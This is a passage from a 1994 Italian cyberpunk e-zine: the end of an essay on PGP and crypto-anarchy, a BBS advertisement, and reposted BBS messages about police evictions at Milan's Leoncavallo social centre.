chiave comune a tutti i partecipanti, bens di una coppia di
chiavi personali specifiche per ciascun individuo. Ognuno genera
in privato la propria coppia: una e' la chiave privata che andra'
tenuta segreta (ed alla quale e' associata per maggior sicurezza
una parola d'ordine), l'altra e' la chiave pubblica vera e propria
che andra' diffusa in rete. Ogni chiave e' costituita da stringhe di
poche centinaia di bytes, facilmente trasportabili nel cyberspace.
Le due chiavi sono legate da una relazione algebrica, ma
conoscendo la chiave pubblica non e' in alcun modo possibile
risalire a quella privata in tempi computazionali ragionevoli
(diverse decine di anni di calcolo con la migliore tecnologia
attuale).
Le due chiavi si dividono i compiti: quella pubblica codifica
i dati, senza poterli decodificare; se A vuole comunicare con B,
usera' la chiave pubblica di B per crittografare il messaggio,
sicuro che solo B e' in possesso della corrispondente chiave
privata (e della parola d'ordine) che consente di risalire al
testo in chiaro. Naturalmente A deve essere in possesso della
chiave pubblica di B e per questo motivo e' interesse di B che la
propria chiave pubblica venga distribuita il piu' possibile su
tutti i canali del c-spazio, tanto piu' che essa ora puo' essere
vista anche da terze parti "male intenzionate", che non essendo in
possesso della chiave segreta non avrebbero comunque piu' la
possibilita' di decodificare il messaggio. Detto per inciso, questo
ha fatto nascere una delle tante mode online: la configurazione
personalizzata del proprio editor allo scopo di aggiungere la
propria chiave pubblica alla fine di ogni messaggio immesso in
rete; inoltre, sempre l'esigenza di diffondere il piu' possibile le
chiavi pubbliche ha condotto alla creazione di archivi/database in
cui si puo' eventualmente cercare la chiave di una persona
specifica con cui si vuole comunicare in perfetta privacy - un
primo tentativo in Italia in questo senso e' stato intrapreso su
BITs Against The Empire BBS (la tana di chi scrive), che in
un'area file apposita conserva tra le altre le chiavi dei piu'
assidui frequentatori di Cybernet.
Una seconda caratteristica della crittografia a chiave
pubblica e' la possibilita' di firmare un messaggio con la propria
chiave privata, lasciandolo in chiaro (senza necessariamente
crittografarlo). Si tratta del processo inverso: B scrive un
messaggio, lo sottopone ad un algoritmo in cui vengono usati come
argomenti la chiave privata (e la parola d'ordine) ed il messaggio
stesso; il risultato e' una firma elettronica costituita da una
stringa di caratteri che viene aggiunta in fondo al testo. A
riceve il messaggio firmato, lo sottopone a verifica utilizzando
la chiave pubblica di B ed ottiene la conferma che solo B puo'
averlo scritto.
I fondamenti della crittografia a chiave pubblica, cioe' cio'
che spiega come tutto questo sia possibile, vengono trattati in
testi specifici reperibili nelle librerie scientifiche. Il
software PGP e' disponibile su molti nodi di Cybernet, in versioni
eseguibili in ambiente MS-DOS, Amiga e UNIX, e sotto forma di
codice sorgente compilabile su qualsiasi altra piattaforma
hardware.
4. Cypherpunk, Cryptoanarchy e altre storie
========================================
Lo sviluppo attuale delle reti e della tecnologia permette di
pensare al ciberspazio come ad un luogo piu' ospitale di qualsiasi
spazio fisico per esperimenti di nuovi modelli di comunita'
libertarie. Le comuni tradizionali, quand'anche riescano a trovare
un proprio equilibrio, rimangono soggette ad attacchi di ogni tipo
da parte di strutture di potere organizzate e violente. Basti
pensare all'apocalisse di Waco in Texas, ai tentativi di creare
collettivita' non-statali in sperdute isolette del Pacifico o agli
sgomberi di molti Centri Sociali Autogestiti in Italia.
La Matrice, Internet, e' invece intrinsecamente decentrata ed
inattaccabile. E' nata durante la guerra fredda per resistere ad
un attacco nucleare sovietico, la distruzione completa di uno
qualsiasi dei suoi nodi non ha nessun effetto sulla vita globale
della rete. E' transnazionale: le legislazioni delle singole
nazioni valgono, al massimo, sui nodi che cadono sotto la
giurisdizione statale. E' caotica: due nodi possono essere
collegati tra loro attraverso strade diverse. All'occurrenza i
nascenti sistemi di remailing e i programmi hackerati di fake-mail
la rendono anche anonima: chi riceve il mio messaggio non puo'
sapere che sono stato io a mandarlo, se io non voglio.
In un simile scenario la crittografia a chiave pubblica
costituisce il sistema di innesco di questo ordigno - la molotov
digitale piu' potente che sia mai stata costruita, al servizio
dell'individuo e delle sue liberta'.
Un programma come PGP permette un grado di confidenza perfetto
tra persone che non si sono mai incontrate fisicamente; piu'
precisamente, permette confidenza e privacy tra pseudonimi e non
tra le rispettive identita' globali. Posso mandare un messaggio (o
un file binario, con dati di qualsiasi tipo) a B, sicuro che
soltanto B potra' leggerlo. Cosa altrettanto importante, posso
essere assolutamente sicuro che il messaggio (firmato) che ho
ricevuto da B puo' essere stato scritto esclusivamente da lui,
tanto che nemmeno lo stesso B potrebbe piu' negarlo. Ma tutte
queste relazioni coinvolgono solo gli pseudonimi a cui sono
associate le chiavi pubbliche e non le altre facce della
personalita' del soggetto "moderno", e tantomeno la sua identita'
legale anagrafica.
Stanno nascendo banche e sistemi di acquisto e pagamento
basate sul *digicash*, sul denaro digitale gestito da persone-
pseudonimi e dalle loro chiavi pubbliche (un esempio e' l'istituto
di credito fondato ad Amsterdam da David Chaum, che da anni si
occupa di crittografia al locale Center of Mathematics and
Computer Science).
Insomma, nello spazio virtuale criptoanarchico posso scegliere
a quale livello condurre le mie relazioni sociali e le mie
transazioni economiche, posso scegliere quale delle mie molteplici
identita' rivelare, e a chi. E posso avere piena fiducia nel flusso
di dati proveniente e firmato da uno pseudonimo di cui non conosco
nulla, se non il suo precedente comportamento nel c-spazio.
E' la vittoria definitiva dell'attore sociale che costruisce
(o distrugge) invece di subire, la vittoria del mondo delle
possibilita' opposto a quello delle qualita' ascritte e del
pregiudizio. Allo stesso modo puo' essere anche il regno della
cospirazione, della massoneria digitale, dei flussi di denaro
incontrollati da un conto bancario all'altro.
*Fuck Off*! I pruriti dei benpensanti servono a ben poco,
esattamente quanto i casi sollevati da NSA e FBI o le
interrogazioni sul possibile uso di questa privacy da parte di
terroristi e narcotrafficanti internazionali. La cryptoanarchia e'
arrivata assieme ai microprocessori degli anni '90, risiede in
pochi bytes di dati duplicabili all'infinito e ovunque, che ci
piaccia o no, inarrestabili.
5. Conclusioni
==============
Tiriamo le fila di tutto questo discorso. Chi non si cabla
oggi, da solo, verra' cablato a forza tra qualche tempo o morira'
di fame e di stenti. Il mondo terreno si e' accorto del
ciberspazio, gli piace e sta clonando se' stesso in rete, con le
sue strutture di controllo e i suoi meccanismi di regolazione. Dal
gennaio 1994 sono entrati in vigore in Italia nuovi articoli di
legge specifici sui reati informatici, sull'hacking e la pirateria
software; adesso circolano proposte per regolamentare il mondo
delle BBS amatoriali, per le quali si prevede l'obbligo di una
concessione apposita. Iniziamo a diventare obiettivi di campagne
elettorali e di posta-spazzatura elettronica. *Gia' visto*. E' un
classico della dialettica tra individuo e sistema sociale: accanto
al vigore normativo e alla dimensione burocratica/razionale, si
esprimono gli aspetti piu' conviviali: cyber-cops, cyber-junkies,
cyber-amici e cyber-figli-di-puttana, le virtual communities e
tutto il resto, l'ufficio anagrafico e il bar di quartiere,
comunita' e societa' convivono gomito a gomito.
Allo stesso modo che nel mondo fisico alcune zone piu' di altre
sfuggono alla pervasivita' delle istituzioni strutturate: la
cultura organizzativa di Fidonet, il piu' esteso network amatoriale
(con 20.000 nodi distribuiti capillarmente su tutto il globo)
prevede che ogni sua conferenza elettronica abbia un regolamento
formale scritto e un moderatore che ne controlli l'applicazione -
al contrario, l'esperienza condotta finora su Cybernet si e'basata
invece proprio sull'assenza esplicita di responsabili e di norme
codificate. E' la vecchia danza tra l'individuo e il suo ambiente,
in cui oscilla l'altalena tra oggettive questioni di vivibilita',
ambizioni personali, potere e necessita' di chiarezza. Naturalmente
ci sono pro e contro ed e' possibile che anche Cybernet decida di
dotarsi in futuro di una policy scritta.
La colonizzazione del ciberspazio, l'Electronic Frontier
Foundation, la democrazia elettronica, i gruppi di pressione che
si stanno formando anche in Italia a favore dei diritti civili in
rete, le comunita' virtuali come The WELL e come SPUNK Press, le
prospettive della crittografia e della cryptoanarchia. Le forme di
vita uscite dal primordiale brodo di coltura di questi primi anni
di cataclismi della telecomunicazione globale. Tutto questo impone
delle scelte anche a chi finora e' sfuggito alla propria mutazione
in una direzione precisa.
Si puo' decidere di unirsi agli sforzi di chi lotta per una
Societa' Giusta, perfino per una *Grande Societa'*. Perfino per la
Libera Repubblica del Ciberspazio, in cui tutti i cittadini sono
"uguali" di fronte alla Legge. Oppure si puo' dissolvere il proprio
pseudonimo e teletrasportarlo altrove, ovunque si incontri una TAZ
accogliente, un luogo ancora libero protetto da una barricata
digitale in grado di nasconderlo per qualche tempo alla vista e
alle coscienze del mondo esterno.
Lo Spettacolo e' appena cominciato.
Luc Pac
BIBLIOGRAFIA ESSENZIALE:
========================
(tutti i documenti elettronici sono disponibili su vari nodi della
rete Cybernet)
Sui rapporti tra istituzioni pubbliche e ciberspazio:
-----------------------------------------------------
EFFector Online, bollettino elettronico, tutti i volumi dal 1992
al 1994.
The White House E-Mail Frequently Asked Questions, documento
elettronico, 1993.
Sugli aspetti sociali dell'interazione in rete:
-----------------------------------------------
Howard Rheingold, The Virtual Community, Addison-Wesley, 1993
Luc Pac, Sociologia del Ciberspazio: la costruzione sociale della
realta' sulle reti telematiche, in preparazione, 1994
Sulla crittografia a chiave pubblica:
-------------------------------------
PGP Pretty Good Privacy User's Manual (allegato al pacchetto PGP)
David Chaum, Achieving Electronic Privacy, Scientific American,
agosto 1992
Su Cryptoanarchy e Cypherpunks:
-------------------------------
Chuck Hammil, From Crossbows to Cryptography: Thwarting the State
Via Technology, documento elettronico, 1987
Eric Hughes, A Cypherpunk's Manifesto, documento elettronico, 1993
Timothy C. May, The Crypto Anarchist Manifesto, documento
elettronico, 1988
=====================================================================
PUBBLICITA' REGRESSO
--------------------
ATD
CARRIER 28.800
CONNECT 28.800/VFC
o Locking Com 1 at 38400.
o Connected to Node 4 at 9600 ,8,N,1.
o Connected at 28.800/VFC
----------------------------------------------------------------------
ProMatrix DOS Shell
Version .21a (c)Copyright The H.C.T. Corporation 01/31/94
(c)Copyright Hi.T.Moonweed 1992-93
Licensed To [ One Man Crew ]
C:\1MC>1mc
1) Here are the current Lines setup and some notes on each nodes:
NODE #1 - ZOOM VFAST 28.8K - Running under Intermail - +972-4-773663
NODE #2 - USR SPORSTER 14.4K - Running under ProMatrix - +972-4-772638
NODE #3 - USR SPORSTER 14.4K - Running under ProMatrix - +972-4-772860
NODE #4 - INTEL v32b 14.4K - Running under ProMatrix - +972-4-773425
NODE #5 - RACKAL-MILGO 14.4K - Running under ProMatrix - +972-4-773896
NODE #6 - ZOOM VFAST 28.8K - Running under ProMatrix - +972-4-771706
2) Now that the ZOOM modems are working fine, and this bbs will be getting
new and new modems and will switch to all 28.8K at the end, it will be
wise to get one yourself. Leave me message if you want amazing fast
28.8K modem, and hell it working great in israel. For Registers by
time: 28.8K will let you download as twice as at 14.4K by the price
of regular registration.
3) Special CD-ROM offer: Real soon you might be able to get your favorite
CD-ROMs at the prices of 120Nis (Cost in a store upto 250 - 350 Nis for
average DISC). Also, you can get your own files wormed up, by only
$60. For More info leave me a message.
4) Comment us for any problems or complains, we are always around to hear
you. We can be reached via private mail on this BBS, or by leaving a
MSG in the Mail-Box.
All The Best
Bonijoni
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 11
LeOnCaVaLlO
-----------
Solidarieta' ad un Gruppo che lotta per la LIBERTA'
===================================================
I messaggi che seguono provengono da Decoder BBS, postati dalla rete ECN.
Leggerli mi ha fatto molto incazzare perche' mi sono reso conto che di tutti
questi casini a Milano la stampa non ha fatto sapere assolutamente NIENTE.
Inoltre, a quanto pare, le forze dell'ordine si muovono in modo molto ... come
dire ... contestabile.
Speriamo, con questa ns rivista, di poter fare qualcosa anche noi per far co-
noscere alla comunita' Hacker/Cyberpunk la realta' delle cose.
-------------------------MESSAGGI------------------------------------------
Area: News dai Centri Sociali
Msg#: 5264 Date: 16 Jul 94 20:38
From: ECN Milano Read: Yes Replied: No
To: tutti Mark:
Subj: parco lambro '94
SI CERCANO I MORTI PER TRE BARACCHE DI LAMIERA
Alle 18,00 di oggi 16 luglio il comandante dei vigili urbani
in compagnia del capo della Digos e del Vicequestore si e'
presentato all'iniziativa di festa e di lotta in corso da
ieri in via Salomone di fronte al centro sociale Leoncavallo,
esigendo lo smontaggio di tre box di lamiera costruiti sul
marciapiede della medesima via. Al rifiuto unanime opposto
verbalmente e pacificamente dai presenti si e' mosso lo
spropositato apparato che da giorni incombe sulle migliaia di
giovani e meno che quotidianamente hanno cominciato a
frequentare l'iniziativa "Nessuna giustizia nessuna pace".
Solo l'immediata reazione dei presenti e probabilmente la
valutazione delle gravissime conseguenze che avrebbe avuto un
attacco di polizia contro centinaia di persone esasperate
dagli infiniti divieti che opposti dal loro sindaco in questi
mesi, e in questi ultimi tempi in modo ossessivo ha evitato
che la situazione degenerasse.
Il termine provvisorio di questa situazione e' giunto, con la
dichiarazione dei responsabili dell'ordine pubblico, di voler
aspettare la giornata di domani per eseguire la volonta' di
Formentini.
E' incredibile che nella Milano del '94 strutture passibili
di sole sanzioni amministrative mobilitino migliaia di
uomini, decretino la militarizzazione dei quartieri,
producano situazioni di gravissimo pericolo per l'incolumita'
di centinaia di persone.
Ma una citta' in cui in un anno sono arrivate quasi 800
denunce a carico di centinaia di giovani, lavoratori fuori e
dentro la fabbrica, disoccupati appartenenti a quel composito
movimento di associazioni, centri sociali, case occupate;
una citta' che ha vietato in sei mesi le manifestazioni di
piazza a questo stesso aggregato; in cui si straparla
incredibilmente e ancora di sgomberi di centri sociali,
mentre si discutera' luned in consiglio comunale, su proposta
del PPI e di alcuni rappresentanti della lega, l'assegnazione
di 9 miliardi, gia' stanziati per le politiche giovanili,
alle associazioni e alle cooperative legate alla Compagnia
delle opere, per quel che riguarda la gestione in comodato e
quindi in forma privatistica dei centri sociali territoriali.
Questo con il preciso intento di cancellare dai territori
metropolitani qualunque spazio di autogestione e autogoverno
che si ponga in modo conflittuale rispetto alle politiche
economiche, sociali e culturali della giunta Formentini.
Tale progetto passa anche attraverso la ridefinizione delle
stesse strutture territoriali del decentramento, dai servizi
alle persone a quelli culturali e ricreativi, destinati a
diventare una versione "aggiornata" dell'oratorio, luoghi in
cui raccogliere consensi e omologare le fasce giovanili.
Quindi, oltre la semplice privatizzazione dell'accesso ai
servizi con il pagamento del biglietto di ingresso, si
escludono gli attuali operatori che da anni lavorano
all'interno dei servizi sopperendo con la loro
professionalita' alla carenza di risorse frutto della
pluriennale politica di smantellamento dei servizi sociali.
Intendiamo continuare l'iniziativa in corso mantenendo tutti
gli appuntamenti di dibattito e di lotta gia' annunciati e che
prevedono per i prossimi giorni:
- luned 18 luglio
ore 6.00 presidio in difesa della casa occupata di via
dei transiti 18 sotto sgombero
ore 17.00 saremo presenti in Consiglio comunale
- marted 19 luglio ore 11.00 presidio davanti al tribunale
in concomitanza con la seconda udienza del processo a carico
di 17 compagni per iniziative ANTIFASCISTE.
Milano, 16 luglio 1994
Le realta' che partecipano al meeting
Msg#: 5290 Date: 18 Jul 94 15:55
From: ECN Milano Read: Yes Replied: No
To: tutti Mark:
Subj: Appello a tutti i compagni !!!
"NESSUNA GIUSTIZIA NESSUNA PACE"
L'iniziativa di festa e di lotta "nessuna giustizia nessuna
pace" promossa da varie realta' antagoniste milanesi, e'
stata oggetto dell'ennesimo e pesantissimo attacco da parte
delle truppe inviate dal Sindaco Formentini, che, di fronte
al legittimo esercizio del diritto a costruire momenti di
incontro, di festa, di dibattito e confronto pubblici, ha
dato una soluzione militare a quello che si configurava come
un semplice reato amministrativo.
E' il prosieguo della pratica di negazione degli spazi ormai
costante in questa citta'; l'ennesima ostentazione della
volonta' di annientare qualsiasi realta' che rifiuta logiche
di omologazione.
ALLE 7.30 DI OGGI, UN NUMERO SPROPOSITATO DI CARABINIERI E
AGENTI DI POLIZIA, CHE DA GIORNI STAZIONANO IN PROSSIMITA'
DEL C.S. LEONCAVALLO, CON L'AUSILIO DELLA PROTEZIONE CIVILE E
DELLA POLIZIA MUNICIPALE, HA ISOLATO E MILITARIZZATO GRAN
PARTE DELLA ZONA DI VIA SALOMONE, OPERANDO LO SMONTAGGIO ED
IL SEQUESTRO DELLE STRUTTURE LEGGERE SISTEMATE NELLA
"STRISCIA DI GAZA", L'AREA LARGA POCHI METRI POSTA DI FRONTE
AL CENTRO SOCIALE DI VIA SALOMONE, IN CUI SI E' SVILUPPATA IN
QUESTI GIORNI LA FESTA. OLTRE ALLA PROVOCAZIONE E ALL'ATTACCO
POLITICO, INGENTISSIMO E' IL DANNO ECONOMICO.
Tutto questo mentre si stava svolgendo un presidio di fronte
alla casa occupata di via dei transiti 28, per impedire lo
sgombero di alcuni appartamenti previsto per oggi, Questo
sgombero e' stato rimandato a mercoledi' 20 luglio, giorno in
cui scade l'assegnazione dei locali della ex-Krupp di via
salomone 71 al C.S. Leoncavallo, ed in cui inoltre le 8
famiglie di via Rilke che da piu' di 45 giorni occupano il
consiglio di zona 13 ne dovranno lasciare i locali.
L'ASSEMBLEA DELLE LE REALTA' ORGANIZZATRICI DELL'INIZIATIVA,
SVOLTASI NELLE PRIME ORE DEL POMERIGGIO, HA RIBADITO LA FERMA
VOLONTA' DI MANTENERE IL PROGRAMMA ORIGINARIO, RICONFERMANDO
TUTTI GLI APPUNTAMENTI IN PROGRAMMA, IN QUESTO LUGLIO
MILANESE IN CUI, CON L'USO DELLA VIOLENZA LEGALIZZATA, SI
VOGLIONO CANCELLARE ESPERIENZE UNICHE DI DEMOCRAZIA DIRETTA E
DI AUTOGESTIONE DEL TERRITORIO.
FACCIAMO APPELLO A TUTTI I COMPAGNI AFFINCHE' SIANO PRESENTI
CON LA MASSIMA MOBILITAZIONE E LA MASSIMA DETERMINAZIONE ALLE
PROSSIME SCADENZE DI LOTTA:
MERCOLEDI' 20 LUGLIO
MOBILITAZIONE GENERALE CONTRO GLI SGOMBERI
SABATO 23 LUGLIO
MANIFESTAZIONE NAZIONALE
LE REALTA' ORGANIZZATRICI DEL MEETING "NESSUNA GIUSTIZIA
NESSUNA PACE"
MILANO, 18 LUGLIO 1994
Per informazioni
Centro Sociale Leoncavallo - tel. 02 58014348 - fax 02 26820360
Radio Onda d'Urto - tel. 02 2827494 / 2825884
Msg#: 5746 Date: 30 Jul 94 20:04
From: Ecn Milano Read: Yes Replied: No
To: All Mark:
Subj: La polizia carica il presidio davanti al consiglio di zona 13 (MI)
Quando il diritto alla casa diventa l'ennesimo attacco repressivo....
Milano, 29/7/94
Questa sera alle 20.30 un gran numero di agenti delle forze dell'ordine hanno
caricato violentemente le famiglie che da 48 ore bloccavano parzialmente il
Viale Ungheria chiedendo una soluzione da parte del Comune.
Dopo essere state sgomberate dalle loro abitazioni, dopo i numerosi colloqui
richiesti alle autorita' competenti, costretti a dormire da 50 giorni dentro
il Consiglio di zona 13, dopo essere stati definiti da autorita' e giornali
mafiosi, con tutti i termini atti a indicare un vero e proprio piano di attac-
co verso persone che se si sono esposte fino a mettersi sulla strade perche'
profondamente convinte di avere tutte le carte in regola per poter chiedere
una casa per diritto.
La violenza delle cosidette forze dell'ordine e' arrivata al punto di pestare
con "armi alla mano" gli occupanti, arrestando 25 persone che stavano manife-
stando contro il silenzio che la stampa di regime e il nuovo potere cittadino
tanto coltivano sui problemi primari che affliggono questa citta' come la casa
e il lavoro.
Questa azione vergognosa apostrofata anche dagli abitanti del quartiere che
gridavano vergogna nei confronti di chi operava tanto brutalita' nei confronti
dei senza casa; e' la conseguenza tangibile e visibile di un sindaco total-
mente incompetente per quanto riguarda i bisogni primari dei cittadini di Mi-
lano, che pensa solamente ai suoi dissidenti interni, a non risolvere il pro-
blema delle abitazioni in questa citta' coprendo ancora una volta il patrimo-
nio socialista attraverso la assegnazioni dubbiose partitrocratiche e in odore
di clientelismo.
Va presa una posizione netta nei confronti di Formentini che non ha saputo
risolvere politicamente il problema della casa ma ancora una volta col manga-
nello della polizia.
GLI SFRATTATI DI VIA RILKE, CHE PERNOTTANO DA DUE MESI NEL CONSIGLIO DI
ZONA 13 CONTINUANO LA LORO OCCUPAZIONE E CHIEDONO LA SOLIDARIETA' DI
TUTTE LE PERSONE COSCIENTI ED INTELLIGENTI, SINCERAMENTE DEMOCRATICHE
AFFINCHE' SI COSTRINGA IL SINDACO DI MILANO A FARE IL SINDACO DI TUTTI I
CITTADINI E NON DI CHI ESERCITA I POTERI FORTI IN QUESTA CITTA'.
Milano, 29 luglio '94
Msg#: 6068 Date: 09 Aug 94 14:17
From: ECN Milano Read: Yes Replied: No
To: all Mark:
Subj: sgomberato il Leoncavallo
questa mattina alle ore 10.00, trecento tra poliziotti e carabinieri hanno
sgomberato il Centro sociale Leoncavallo. All'interno si trovavano 5 compagni,
che sono stati solo identificati. Poi il materiale del centro sociale e' stato
portato in un deposito comunale. il questore Serra ha dichiarato di non vedere
nessun problema sociale ne sedi alternative. E' stato solo eseguito uno
sfratto. Gli occupanti verranno denunciati per violazione di una ordinanza
dell'autorita, quella che imponeva il rilascio dell'immobili. Alle ore 14 la
polizia circonda ancora il centro sociale e si sta tentando un presidio al
parco Alessandrini, vicino all'ortomercato.
Il boia sindaco Formentini ha dichiarato la sua soddisfazione, definendo
definitivamente morto il centro sociale.
Msg#: 6070 Date: 09 Aug 94 15:45
From: ECN Milano Read: Yes Replied: No
To: tutti Mark:
Subj: sgomberato centro sociale leoncavallo
milano, 9 agosto 1994
comunicato stampa
alle 10.00 di questa mattina, in una milano ormai deserta, dopo aver
completamente militarizzato la zona est della citta', un ingente numero di
ps e cc ha sfondato le porte del Centro Sociale Leoncavallo e sta ora
procedendo allo sgombero.
Questo e' un atto gravissimo, che evidenzia ulteriormente la precisa volonta'
del sindaco formentini e della sua giunta di cancellare definitivamente dal
territorio tutte quelle realta' sociali e politiche che, da decenni portano
avanti lotte per il diritto alla casa, al reddito, a spazi a uso sociale e
collettivo.
Questo attacco all'opposizione sociale si sta strutturando a piu' livelli,
dalle oltre 850 denunce emesse a carico dei compagni di milano nell'ultimo
anno e mezzo, agli sgomberi di case occupate e centri sociali, ai processi.
Questi straordinari laboratori di lotte sociali e politiche, di sperimentazio-
ne culturale, di aggregazione slegata dalle logiche del profitto, sono l'anima
democratica, antifascista e viva di territori ormai consegnati nelle mani del-
la speculazione edilizia, dell'eroina e dei poteri forti di questa citta'.
E' fondamentale ribadire a chi ci vorrebbe assenti dai territori, che espe-
rienze come quella del Centro Sociale Leoncavallo, delle case occupate e degli
altri centri sociali, non possono venire cancellate dalla storia presente e
futura della citta'.
Lanciamo quindi un appello a tutte le realta' sociali e politiche, ai compa-
gni, ai frequentatori dei centri sociali, affinche' sia evidente a tutti che
queste realta', che negli anni sono state patrimonio di migliaia di persone e
intelligenze che le hanno attraversate e arricchite, hano pieno titolo e piena
legittimita' ad esistere e non si lasceranno cancellare dai territori nei qua-
li vivono e agiscono da decine di anni.
Abbiamo indetto una conferenza stampa per oggi alle ore 14 in via salomone 71.
Indiciamo fin da ora una mobilitazione collettiva !!!
Per informazioni: CENTRO SOCIALE LEONCAVALLO
tel. 02 26140287 - 0337 328455
fax 02 26820360
nessuna giustizia nessuna pace
Msg#: 6141 Date: 10 Aug 94 10:52
From: ECN Milano Read: Yes Replied: No
To: tutti Mark:
Subj: ruspe a villa amantea
questa mattina alle 8,30
la polizia municipale e' intervenuta con le ruspe
a villa amantea, dove ha abbattuto le strutture
del tendone di "su la testa" adiacente al Centro
Sociale Spazzali che vi svolgeva le proprie iniziative
Msg#: 6145 Date: 10 Aug 94 16:22
From: Lrkwz Read: Yes Replied: No
To: ECN Milano Mark:
Subj: Re: sgombero leoncavallo
ECN Milano il 08-09-94 15:56 scrisse a proposito di
'sgombero leoncavallo' :-)
EM> NESSUNA GIUSTIZIA NESSUNA PACE
Si puo' telefonare in tanti al 6236 chiedendo della segreteria del
sindaco (boiardo) per esprimeere la propria protesta.
N.ri alternativi:
sindaco-capo segreteria s. 86463515
vice sindaco 865244/877846
purtroppo non mollano il n.ro del fax, si possono solo scrivere lettere.
Msg#: 6378 Date: 13 Aug 94 15:18
From: snd Read: Yes Replied: No
To: All Mark:
Subj: milano 12 agosto - la chiusura di spazi continua
ieri mattina, venerdi' 12 agosto, alle 10,30 le forze dell'ordine
hanno nuovamente circondato parco alessandrini x imporre che
venissero staccati tutti gli striscioni del leo che erano stati
appesi lungo la rete di recinzione del parco, motivazione:
propaganda abusiva !!!
ridicolo ? abbastanza, se non fosse che CONTEMPORANEAMENTE
un nutrito manipolo della polizia municipale provvedeva a sgomberare
dai locali del consiglio di zona 13 ( in v.le ungheria - a uno sputa
da via salomone ) le 8 famiglie di sfrattati di via rilke che da 2
mesi li stavano occupando
ora il consiglio di zona e' saldamente presidiato
dalla polizia municipale.
attorno alle 21 ps e cc si sono di nuovo schierati davanti al parco
alessandrini per "chiedere" che un furgone, momentaneamente
parcheggiato su un prato, venisse spostato :-(((
scusate, mi scappa da kagare; adesso telefono un attimo in questura
x sapere se posso andare al cesso o se me la devo fare nei pantaloni ...
- a presto -
Msg#: 6559 Date: 18 Aug 94 22:41
From: snd Read: Yes Replied: No
To: All Mark:
Subj: leo
voila' !!!
l'iniziativa di tre giorni di concerti e - forse - altre cose
di cui era gia' stata negata l'autorizzazione x parco Alessandrini,
non e' stata autorizzata nemmeno nello spiazzo davanti al Centro
Sociale Spazzali.
Ieri il Questore ha comunicato ad alcuni rappresentanti del
Leoncavallo che l'autorizzazione chiesta da 2 consiglieri di
RC all'assessorato comunale competente, era stata negata
1. i consiglieri d'opposizione di Rifondazione Comunista
2. chiedono al Comune un'autorizzazione
3. il Questore
4. convoca i rappresentanti del Leo
* per dire loro che l'autorizzazione di cui sopra non e' concessa
oggi, pikkolo experimendo :
* alcuni compagni vanno con un furgone allo Spazzali ( "presidiato"
a breve distanza da polizia municipale e forze dell'ordine ) e
* appena scaricati 2 pezzi di palco arriva l'esercito
"ne' qui ne' la', 'a festa non si fa in tuuutta la citta'" :-)
insomma: la digos affermava che dal Comune di Milano e' stata
emessa un'ordinanza che interdice qualsiasi spazio, pubblico o
privato, in tutta la citta', a qualsiasi genere di manifestazione
pubblica che non sia autorizzata, e che quindi loro dovevano intervenire
non e' stato possibile prendere visione di detta "ordinanza"
subito dopo i vigili urbani hanno accompagnato alcuni tecnici del
comune ad ispezionare la costruzione del centro sociale per
"verificarne la stabilita'".
verifica che ha dato esito positivo, i locali hanno tutti i
requisiti di stabilita' necessari per essere abitabili, ma
non quelli necessari per ospitare manifestazioni pubbliche.
poco piu' tardi u assessore comunale ha dichiarato alla
stampa che in ogni caso nell'area antistante il centro sociale
spazzali, l'azienda energetica municipale aveva gia' messo
in previsione di iniziare DA DOMANI 19 AGOSTO dei lavori di scavo
quindi allo stato attuale dell'arte
* I CONCERTI NON CI SARANNO *
DOMANI CERCHEREMO COMUNQUE DI "PRENDERCI"
LA PIAZZA ANTISTANTE LO SPAZZALI PER FARCI 3 GIORNI
DI ASSEMBLEE E DIBATTITI O NON SO CHE'
- a presto -
Msg#: 6646 Date: 21 Aug 94 01:07
From: snd Read: Yes Replied: No
To: All Mark:
Subj: leo/spazzali
TORDELLI CERCA LO SGOMBERO DELLO SPAZZALI
La giornata di dibattiti prevista dal programma della 3 giorni
antirazzista convocata dal leo presso il centro sociale spazzali,
e' stata caratterizzata da un'imponente dispiegamento forze dell'
ordine fatte intervenire dall'assessore leghista Tordelli - sindaco
pro tempore durante le vacanze di Formentini ( che anche in sardegna
e' stato colpito dall'ormai consueto volantino "in questa citta'
circola un uomo pericoloso ..." grazie allo spirito di iniziativa
di un gruppo di ragazzi del posto :-).
Verso le 19, mentre era in corso l'assemblea dei centri sociali e
delle realta' autogestite milanesi, giungeva notizia di un'operazione
di ammassamento di mezzi di ps e cc all'ingresso del quartiere.
Poco dopo l'intera zona di baggio nel raggio di oltre un chilometro
dal centro sociale e' stata chiusa dai vigili urbani, e i mezzi
della polizia hanno cominciavato a disporsi lungo le strade che portano
al centro sociale.
Da alcuni giornalisti che intanto cominciavano ad arrivare si veniva
a sapere che il sindaco pro tempore, Tordelli, e il presidente
del consiglio comunale, la leghista Gazzola, stavano per arrivare
a Baggio, e che lo schieramento di truppa era dovuto alla loro
imminente presenza. Spiegazione del tutto incongruente con le
dimensioni che stava assumendo il dispiegamento di forze davanti
ai nostri occhi.
Attorno alle 19,30 i mezzi blindati e truppa a terra iniziavano
a circondare l'area ( piuttosto vasta ) in cui si trova il centro
sociale. I compagni presenti - oltre un centinaio - hanno
immediatamente barricato i lati da cui era possibile l'accesso.
Alcuni compagni si recavano dalla Digos per avere spiegazioni,
e contemporaneamente sopraggiungeva il consigliere di RC
"atomo" Tinelli, da cui si veniva a sapere che il sindaco,
dopo aver saputo che ieri sera l'iniziativa si e' svolta
regolarmente, e per di piu' con tanto di CONCERTO e grande
afflusso di gente ( quando la festa della lega riusciva a
malapena a raccogliere un 50/100 persone a sera ), aveva
imposto alla polizia l'intervento al fine di operare uno
sgombero immediato ( l'area del centro sociale e' di proprieta'
comunale ).
Poco dopo giungeva anche il suddetto Tordelli con la Gazzola.
In un primo momento hanno cercato con nonchalance di avviarsi
verso l'ingresso del centro sociale, ma hanno poi desistito,
scoraggiati dall'espressione trucissima dei non pochi
compagni che sono andati loro incontro.
Intanto la notizia si diffondeva in citta' e cominciava ad
arrivare gente, che a piedi riusciva a raggiungere il centro sociale.
Il flusso di persone, anche quelle richiamate dall'iniziativa,
e' continuato per tutta la sera, raggiungendo presto le dimensioni
di ieri, nonostante si dovesse lasciare la macchina molto distante
e attraversare diversi blocchi di schieramenti di forze dell'
ordine.
Si e' deciso di restare tutta la notte ( facendo anche dei turni
per dormire ) e di riprendere domani l'iniziativa, con la
discussione per prepare la convocazione del corteo nazionale
del 10 settembre.
Il concerto non si e' potuto svolgere e il centro sociale
Spazzali sara' probabilmente ( anzi sicuramente, secondo le
valutazioni dei presenti e voci di fonti diverse ) sgomberato
nei primi giorni ( lunedi' o martedi' ) della settimana entrante.
- a presto -
